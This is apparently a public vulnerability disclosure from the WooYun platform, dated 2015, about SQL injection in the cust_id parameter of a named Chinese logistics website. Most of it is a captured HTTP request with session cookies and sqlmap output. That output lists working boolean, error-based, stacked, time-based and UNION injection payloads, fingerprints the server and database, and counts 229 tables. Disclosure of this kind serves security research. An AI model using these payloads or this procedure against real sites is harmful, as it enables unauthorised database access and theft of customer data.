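2015-11-11: Details reported to the vendor; awaiting vendor handling.
2015-11-24: The vendor actively ignored the vulnerability; details disclosed to the public.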
POST /Ashx/GetWshi.ashx?companyName=%25u4E91%25u5357%25u6B63%25u901A%25u5FB7%25u4FE1%25u8D27%25u8FD0%25u6709%25u9650%25u516C%25u53F8&cust_id=1072364&pid=1&wshiCity=%25u4E91%25u5357%25u7701%25u6606%25u660E%25u5E02 HTTP/1.1
Content-Length: 485
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=xmz5ifblol3dv4qgymnrpd00; TemGold_1072364=1,14,4,3,5,6,11,12,10,13; TemFormat_1072364=lsrb; BAIDUID=8E474BC330333966DD7B0C2263535823:FG=1; Hm_lvt_b056f6db54a055cf5bfde997b9ed913f=1447121410,1447121416,1447121458,1447121708; Hm_lpvt_b056f6db54a055cf5bfde997b9ed913f=1447121708; Hm_lvt_d653978debccea19667b401ab77ac0ad=1447121410,1447121416,1447121458,1447121708; Hm_lpvt_d653978debccea19667b401ab77ac0ad=1447121708; HMACCOUNT=A63704B16C8F6603
Host: ynztwl.chinawutong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

companyName=%25u4E91%25u5357%25u6B63%25u901A%25u5FB7%25u4FE1%25u8D27%25u8FD0%25u6709%25u9650%25u516C%25u53F8&cust_id=123&kind=%25u914D%25u8D27%25u4FE1%25u606F%25u90E8&pid=1&random=0.7215899890288711&toCity=%25u94DC%25u5DDD%25u5E02&toPro=%25u9655%25u897F%25u7701&wshiCity=%25u4E91%25u5357%25u7701%25u6606%25u660E%25u5E02
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cust_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 AND 8050=8050&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 AND 4256=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4256=4256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113)))&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1280=1280) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113))&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123;WAITFOR DELAY '0:0:5'--&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 WAITFOR DELAY '0:0:5'&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(104)+CHAR(109)+CHAR(84)+CHAR(87)+CHAR(97)+CHAR(101)+CHAR(66)+CHAR(101)+CHAR(90)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: Wutong
[229 tables]
Severity: No impact, ignored by vendor
Ignored at: 2015-11-24 07:14
Vulnerability Rank: 4 (WooYun rating)
None yet